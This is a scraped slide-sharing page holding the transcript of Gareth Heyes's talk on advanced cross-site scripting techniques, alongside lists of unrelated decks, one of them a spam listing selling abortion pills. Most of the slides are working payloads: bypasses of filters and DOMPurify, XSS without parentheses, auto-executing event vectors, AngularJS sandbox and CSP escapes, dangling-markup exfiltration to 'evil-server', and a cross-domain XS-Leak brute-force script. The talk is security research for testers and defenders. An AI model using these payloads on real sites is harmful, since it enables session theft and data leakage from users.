Build a game with javascript (may 21 atlanta)Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)
 
jQuery
jQueryjQuery
jQuery
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Xml part 6
Xml part 6Xml part 6
Xml part 6
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!
 

Recently uploaded

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Recently uploaded (20)

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

XSS Magic tricks

  • 1. XSS magic tricks Advancements in XSS By Gareth Heyes @garethheyes
  • 2. • I ❤ hacking JavaScript
 
 
 
 
 
 
 
 • I'm a researcher at PortSwigger • Follow me on Twitter @garethheyes About me <a href=# name=x id=x>Click me on IE11</a> <script event="onclick(blah)<wtfbbq>{}" for=x> blah.view.alert(1) </script> <script event=onload for=window> return alert(2)};{ </script>
  • 4. • Consuming tags • title, noscript, style, script, noembed, textarea, plaintext, template, iframe, noframes
 
 
 
 • Template tag breaks out of select element <noframes> <img alt=" "> </noframes> <img alt=" "> </noframes> </noframes><script>alert(1)</script> Hacking filters <template><select><option></template><img src=1 onerror=alert(1)></select></template>
  • 5. • Title exists in SVG and HTML • Title consumes markup in HTML but not in SVG • HTML in SVG? Hacking filters
  • 8. • Edge bug causes title mutate • E.g. 
 in: <title>&lt;img&gt;
 out:<title><img> • I used this bug to bypass DOMPurify • in: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
 out: <title></title><img src="1"> • What about double HTML encoded? • in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
 out: <title></title><img src=1 onerror=alert(1)></title> Hacking filters
  • 9. • Invalid attributes
 <img ="/src/onerror=alert(1)//"> • HTML closing comments Firefox (version <=67)
 <!-- --!
 ><img src=1 onerror=alert(1)> --> • HTML opening comments Firefox (version 68.0.1)
 <!-[x00][x00][x00][x00][x00]- ><div title="--><img src=1 onerror=alert(1)>"></div> Hacking filters
  • 10. • Firefox allows NULLs in entities • <a href="javascript&[0x00]#x6a;avascript:alert(1)">
 test</a> • <a href="javascript&[0x00]colon[0x00];alert(1)">
 test</a> Hacking filters
  • 11. • Safari base tag • <base href="javascript:/a/-alert(1)///////"> • Turns every relative URL into XSS • <a href=../lol/safari.html>test</a> • <a href>haha</a> Hacking filters
  • 13. • Everyone knows about alert`1` • I found you could do: onerror=alert;throw 1 • throw accepts a JavaScript expression XSS without parenthesis and semi-colons
  • 14. • JavaScript expressions • x = (1,2);
 x//2 • Right hand side of expression is returned XSS without parenthesis and semi-colons
  • 15. throw onerror=alert,'some string', 123,'haha' • First part of the expression is executed sets the error handler • Last part of the expression is sent to exception handler XSS without parenthesis and semi-colons
  • 16. • How can you eval a string? • Prefixed with uncaught • Change it to an assignment
 
 throw onerror=eval,"=alertx281x29"
 //Uncaught = alert(1) XSS without parenthesis and semi-colons
  • 17. {onerror=eval}
 throw{lineNumber:1, columnNumber:1,
 fileName:1,
 message:'alertx281x29'} • Firefox prefixes exception message with:
 uncaught exception: 1 • How can we get round this? XSS without parenthesis and semi-colons
  • 19. • XSS in hidden input • Unexploitable when <> is filtered?
 <input type="hidden" value="XSS HERE"> • Access keys to the rescue! • "The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element." mdn Hidden inputs
  • 20. • Firefox allows onclick event + access keys • <input type="hidden" accesskey="x" onclick="alert(1)">
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) • Firefox only but the technique can be used on Chrome Hidden inputs
  • 22. • Access keys can be used on Chrome • Hidden inputs don't work • Other elements link, meta etc do
 <link rel="canonical" accesskey="X" onclick="alert(1)" />
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) Link elements
  • 24. • Uses incomplete markup to extract parts of the page • <img src='//evil-server? • HTML parser finds an incomplete src attribute • Looks for ' to close the attribute Dangling markup
  • 25. • Example dangling markup attacks • <table><tfoot background="//evil-server? • <link rel=icon href="//evil-server? • <video><source src="//evil? Dangling markup
  • 26. • Chrome protects against dangling markup attacks • "Resource requests whose URLs contained both removed whitespace (`n`, `r`, `t`) characters and less-than characters (`<`) are blocked." https://www.chromestatus.com/feature/ 5735596811091968 • CSP will also block external requests if specified in the policy Dangling markup
  • 27. • Bypassing restrictive CSP & Chrome mitigations • CSP: default-src 'none'; base-uri 'none'; • <base target=" • Sets target for every link • The markup will get passed in the window name Dangling markup
  • 28. • <a href=//evil-server><font size=100 color=red>You must click me</font></a><base target=" • Anchor points to evil server • HTML styling is used to get round no inline styles • Target consumes all markup until the " is found • Clicking the link loads attackers server which reads window.name that contains the consumed markup Dangling markup
  • 29. • Mitigation <base target="_self" /> • Prevents target being overwritten • Bypass requires 2 clicks • <input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/ font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></ button><form id=x target=" Dangling markup
  • 31. • Firefox onloadstart
 <img src=1 onloadstart=alert(1)> • Firefox onloadend
 <img src=1 onloadend=alert(1)> • <video><track default onload=alert(1) src="data:text/ vtt,WEBVTT"></video> Auto executing vectors
  • 32. • Chrome
 <svg><discard onbegin=alert(1)> • Safari
 <svg><anything onload=alert(1)> • General svg 
 <svg><animate onbegin=alert(1) attributename=x dur=1s>
 <svg><set onend=alert(1) attributename=x dur=1s>
 <svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2> Auto executing vectors
  • 33. • <body onpageshow=alert(1)> • <body onpopstate=alert(1)>
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com/#';flag=1}"> • <body onhashchange="alert(1)">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';window.flag=1;}"> • <body onmessage=alert(1)>
 <script>
 postMessage('test','*')
 </script> Auto executing vectors
  • 34. • <body onbeforeunload="location='javascript:alert(1)'">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';flag=1}"> • <body onresize="alert(1)">
 <iframe src=//x-domain.com onload="this.style.width='1000px'"> • <body onscroll=alert(1)><div style=height:1000px></ div><div id=x></div> Auto executing vectors
  • 35. • <style>
 @keyframes x{
 }
 </style>
 <b style="animation-name:x" onanimationstart="alert(1)"></b>
 <b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b> • Discovered by the legend Mario Heiderich • Executes on every tag but requires an injected style Auto executing vectors
  • 36. • ontransitionend works on Chrome • <style>
 :target {
 color:red;
 }
 </style>
 <x id=x style="transition:color 1s" ontransitionend=alert(1)> • URL: page.html#x Auto executing vectors
  • 37. • ontransitionrun works on Firefox • <style>
 :target {
 color:red;
 }
 </style>
 <x id=y style="transition:color 2s" ontransitionrun=alert(1)> • URL: page.html • URL: page.html#x Auto executing vectors
  • 38. • Firefox ontransitioncancel • <style>
 :target {
 color: red;
 }
 </style>
 <x id=x style="transition:color 10s" ontransitioncancel=alert(1)> • URL: page.html# • URL: page.html#x • URL: page.html# Auto executing vectors
  • 39. • Remember the classic vector?
 <input autofocus onfocus=alert(1)> • Autofocus required? • Nope 😀 <input onfocus=alert(1) id=x> • URL: page.html#x Auto executing vectors
  • 40. • onblur becomes auto executable (Every browser except Firefox) • <input onblur=alert(1) id=x><input autofocus>
 <textarea onblur=alert(1) id=x></textarea><input autofocus>
 <button onblur=alert(1) id=x></button><input autofocus>
 <select onblur=alert(1) id=x></select><input autofocus> • URL: page.html#x • Focus events fire for iframes too • <body onblur=alert(1)><iframe id=x></iframe>
 <iframe id=x onblur=alert(1)></iframe><input autofocus> Auto executing vectors
  • 41. • <embed id=x onfocus=alert(1) type=text/html> • <object id=x onfocus=alert(1) type=text/html> • <video id=x controls onfocus=alert(1)>
 <source src="validvideo.mp4" type=video/mp4>
 </video> • <audio id=x controls onfocus=alert(1) id=x>
 <source src="validaudio.wav">
 </audio> Auto executing vectors
  • 43. • Standard AngularJS sandbox escape:
 {{constructor.constructor('alert(1)')()}} • Can we make it shorter? • {{$eval.constructor('alert(1)')()}} • Shorter still?
 {{$on.constructor('alert(1)')()}}
 //Credits Lewis Ardern AngularJS
  • 44. • What if you can't call $eval? e.g. in a orderBy filter • Can't use strings • {{toString().constructor.prototype.charAt=[].join; [1,2]| orderBy:toString().constructor.fromCharCode(120,61,9 7,108,101,114,116,40,49,41)}} AngularJS
  • 45. • CSP bypass for all versions of AngularJS • 63 characters! • <input id=x ng-focus=$event.path| orderBy:'CSS&&[1].map(alert)'> • page.html#x • Cross browser:
 <input id=x ng-focus=$event.composedPath()| orderBy:'CSS&&[1].map(alert)'> AngularJS
  • 47. • Focus event fires for iframe, input etc • Can we detect if this happens cross domain? • If it can be detected then id's can be bruteforced x-domain XS-Leak
  • 48. • onblur event will be fired when cross domain element is focused • Hash can be checked multiple times with only 1 http request • Requires a frame-able page XS-Leak
  • 49. XS-Leak Cross domain input element Same origin onblur event Same origin, shows current position <input id=1337> <body onblur="if(!window.found){window.found=true;alert('Found: '+pos)}"> <div id=y></div>
  • 50. pos = 1000;found = false; var iframe = document.createElement('iframe');iframe.src='//x-domain.com'; document.body.appendChild(iframe);iframe.onload = next; function next() { if(!found){ document.getElementById('y').textContent = pos; iframe.src='//x-domain.com#'+pos; timer = setTimeout(function(){ if(!found && pos < 2000) { pos++; } next(); },50); } } //http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/ XS-Leak
  • 51. Auto execute on every tag?
  • 52. • "The tabindex global attribute indicates if its element can be focused, and if/where it participates in sequential keyboard navigation" mdn • <a onfocus=alert(1) id=x tabindex=1> • <div onfocus=alert(1) id=x tabindex=1> • <xss onfocus=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
  • 53. • Works on pretty much every tag • Link works but requires display block • <link onfocus=alert(1) id=x tabindex=1 style=display:block> • Link works in the body but not head Auto execute on every tag?
  • 54. • <a onfocusin=alert(1) id=x tabindex=1> • <div onfocusin=alert(1) id=x tabindex=1> • <xss onfocusin=alert(1) id=x tabindex=1> • <xss onfocusout=alert(1) id=x tabindex=1><input autofocus> • page.html#x Auto execute on every tag?
  • 55. • IE activate/beforeactivate event • <a onactivate=alert(1) id=x tabindex=1> • <div onactivate=alert(1) id=x tabindex=1> • <xss onactivate=alert(1) id=x tabindex=1> • <xss onbeforeactivate=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
  • 56. • IE deactivate/beforedeactivate event • <a ondeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • <xss ondeactivate=alert(1) id=x tabindex=1></ xss><input id=y autofocus> • <xss onbeforedeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • page.html#x • page.html#y Auto execute on every tag?
  • 57.
  • 58.
  • 59. Questions? thanks and shout outs to @garethheyes James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski <img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">